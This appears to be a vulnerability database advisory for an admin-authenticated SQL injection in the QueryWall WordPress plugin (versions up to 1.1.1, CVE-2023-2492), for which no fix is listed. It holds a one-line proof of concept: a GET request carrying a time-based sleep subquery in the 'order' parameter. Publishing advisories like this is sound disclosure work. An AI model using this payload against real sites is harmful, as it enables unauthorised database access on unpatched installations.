WordPress Plugin Vulnerabilities

QueryWall: Plug'n Play Firewall <= 1.1.1 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Proof of Concept

1. Send `GET /wp-admin/admin.php?page=querywall&orderby=date_time_gmt&order=desc%2c(select*from(select(sleep(20)))a)`
2. See SQL execution

Affects Plugins

Plugin icon
querywall
No known fix

References

CVE
CVE-2023-2492

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes
WPVDB ID
fa7c54c2-5653-4d3d-8163-f3d63272c050

Timeline

Publicly Published
2023-05-26 (about 11 months ago)
Added
2023-05-26 (about 11 months ago)
Last Updated
2023-05-26 (about 11 months ago)

Other

Published
Title
Published
2014-08-01
Title
myLDlinker - SQL Injection
Published
2014-08-01
Title
WordPress 1.5 wp-trackback.php tb_id Parameter SQL Injection
Published
2015-09-15
Title
CP Reservation Calendar <= 1.1.6 - Unauthenticated SQL Injection
Published
2023-01-19
Title
GiveWP < 2.24.1 - Unauthenticated SQLi
Published
2023-10-11
Title
ChatBot < 4.9.1 - Unauthenticated Blind SQL Injection